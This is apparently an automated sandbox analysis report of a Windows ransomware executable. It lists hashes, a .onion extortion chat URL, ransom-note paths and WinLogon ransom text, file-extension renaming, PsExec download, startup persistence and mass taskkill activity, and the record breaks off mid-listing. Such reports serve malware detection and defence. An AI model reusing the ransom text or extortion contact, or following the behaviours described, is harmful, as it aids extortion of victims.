Analysis
-
max time kernel
152s -
max time network
143s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
02-11-2021 15:42
Static task
static1
Behavioral task
behavioral1
Sample
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe
Resource
win10-en-20211014
General
-
Target
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe
-
Size
147KB
-
MD5
86ad533921708b0668096db5c7625412
-
SHA1
5fa4eea3b307a2de4de5e86620f40aa83e0c7938
-
SHA256
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216
-
SHA512
a1af898f3b2ef1d01e3406dfc1acb4bafb9f9931de9005d33f1c17bccbdf0b27abd0d20e2d00771ccf1ce4920836145c7f70e4b913b4ceb350bdf0fa889b27ea
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=NMU7PHR3V5
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=NMU7PHR3V5
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=NMU7PHR3V5
Signatures
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 11 http://live.sysinternals.com/PsExec.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 15 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exedescription ioc process File renamed C:\Users\Admin\Pictures\FormatPush.png => C:\Users\Admin\Pictures\FormatPush.png.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File renamed C:\Users\Admin\Pictures\MountNew.tiff => C:\Users\Admin\Pictures\MountNew.tiff.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File renamed C:\Users\Admin\Pictures\UnprotectSave.raw => C:\Users\Admin\Pictures\UnprotectSave.raw.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File renamed C:\Users\Admin\Pictures\UninstallBlock.tif => C:\Users\Admin\Pictures\UninstallBlock.tif.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\UninstallBlock.tif.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\UnprotectSave.raw.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File renamed C:\Users\Admin\Pictures\CompleteCompress.crw => C:\Users\Admin\Pictures\CompleteCompress.crw.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\CompleteCompress.crw.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File renamed C:\Users\Admin\Pictures\StopMount.png => C:\Users\Admin\Pictures\StopMount.png.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\FormatPush.png.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\TestSkip.raw.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File renamed C:\Users\Admin\Pictures\TestSkip.raw => C:\Users\Admin\Pictures\TestSkip.raw.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\MountNew.tiff 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\MountNew.tiff.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\Admin\Pictures\StopMount.png.NMU7PHR3V5 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1224 cmd.exe -
Drops startup file 1 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Drops desktop.ini file(s) 6 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exedescription ioc process File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exedescription ioc process File opened (read-only) \??\U: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\P: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\S: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\K: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\Z: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\B: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\N: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\W: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\X: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\V: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\E: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\I: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\O: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\H: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\J: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\L: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\M: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\Q: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\T: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\Y: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\A: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\F: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\G: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe File opened (read-only) \??\R: 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY WAS HACKED AND COMPROMISED!!!" 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\nWe has DOWNLOADED of your PRIVATE SENSITIVE Data!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1112 taskkill.exe 1968 taskkill.exe 1548 taskkill.exe 432 taskkill.exe 1156 taskkill.exe 1052 taskkill.exe 1056 taskkill.exe 1468 taskkill.exe 1640 taskkill.exe 840 taskkill.exe 1848 taskkill.exe 1532 taskkill.exe 1980 taskkill.exe 1060 taskkill.exe 1936 taskkill.exe 1676 taskkill.exe 964 taskkill.exe 548 taskkill.exe 884 taskkill.exe 1268 taskkill.exe 1740 taskkill.exe 1900 taskkill.exe 1092 taskkill.exe 1148 taskkill.exe 864 taskkill.exe 1192 taskkill.exe 1076 taskkill.exe 1252 taskkill.exe 2012 taskkill.exe 1784 taskkill.exe 1120 taskkill.exe 1816 taskkill.exe 792 taskkill.exe 796 taskkill.exe 1788 taskkill.exe 1736 taskkill.exe 1488 taskkill.exe 1132 taskkill.exe 1712 taskkill.exe 1352 taskkill.exe 1512 taskkill.exe 1760 taskkill.exe 1684 taskkill.exe 1672 taskkill.exe 1720 taskkill.exe 1332 taskkill.exe 420 taskkill.exe 1508 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exepid process 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
mshta.exepid process 1096 mshta.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe Token: SeDebugPrivilege 1684 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 1900 taskkill.exe Token: SeDebugPrivilege 840 taskkill.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 1488 taskkill.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 1148 taskkill.exe Token: SeDebugPrivilege 1332 taskkill.exe Token: SeDebugPrivilege 1848 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 964 taskkill.exe Token: SeDebugPrivilege 1252 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 1112 taskkill.exe Token: SeDebugPrivilege 1156 taskkill.exe Token: SeDebugPrivilege 1784 taskkill.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 1120 taskkill.exe Token: SeDebugPrivilege 420 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeDebugPrivilege 548 taskkill.exe Token: SeDebugPrivilege 1508 taskkill.exe Token: SeDebugPrivilege 1980 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 792 taskkill.exe Token: SeDebugPrivilege 1712 taskkill.exe Token: SeDebugPrivilege 1192 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 1076 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 1548 taskkill.exe Token: SeDebugPrivilege 884 taskkill.exe Token: SeDebugPrivilege 796 taskkill.exe Token: SeDebugPrivilege 1268 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 1936 taskkill.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 1640 taskkill.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: SeDebugPrivilege 1788 taskkill.exe Token: SeDebugPrivilege 1168 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exepid process 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exepid process 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exedescription pid process target process PID 652 wrote to memory of 1684 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1684 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1684 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1684 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1044 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1044 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1044 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1044 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1096 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1096 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1096 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1096 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe reg.exe PID 652 wrote to memory of 1956 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe schtasks.exe PID 652 wrote to memory of 1956 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe schtasks.exe PID 652 wrote to memory of 1956 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe schtasks.exe PID 652 wrote to memory of 1956 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe schtasks.exe PID 652 wrote to memory of 1000 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1000 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1000 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1000 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1644 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1644 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1644 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1644 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 924 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 924 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 924 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 924 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 668 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 668 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 668 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 668 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1564 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1564 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1564 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1564 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1912 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1912 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1912 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1912 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 812 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 812 652 